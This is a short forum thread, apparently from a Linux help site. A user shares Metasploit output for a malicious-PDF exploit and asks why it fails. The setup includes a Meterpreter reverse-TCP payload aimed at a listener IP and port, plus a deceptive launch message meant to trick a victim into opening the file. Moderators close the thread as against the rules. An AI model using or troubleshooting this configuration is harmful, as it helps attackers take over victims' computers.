adobe_pdf_embedded_exe exploit
Module options (exploit/windows/fileformat/adobe_pdf_embedded_exe):
Name Current Setting Required Description ---- --------------- -------- ----------- EXENAME no The Name of payload exe. FILENAME chapter1.pdf no The output filename. INFILENAME chapter1.pdf yes The Input PDF filename. LAUNCH_MESSAGE To view the encrypted content please tick the "Do not show this message again" box and press Open. no The message to display in the File: area Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.100.1 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English) msf exploit(adobe_pdf_embedded_exe) > exploit [-] Exploit failed: The following options failed to validate: INFILENAME. I don't know why this error is occurring. please help.. |
How exactly(!) did you generate this error?
What system + version is this running on.? |
I m using an exploit:
adobe_pdf_embedded_exe exploit M using kali2.0 |
please post CRACKING questions on the kali irc or on *.onion or *.i2p sites
|
Asking how to exploit windows using Linux is out of scope, and against our rules. Closed.
|
All times are GMT -5. The time now is 05:22 PM. |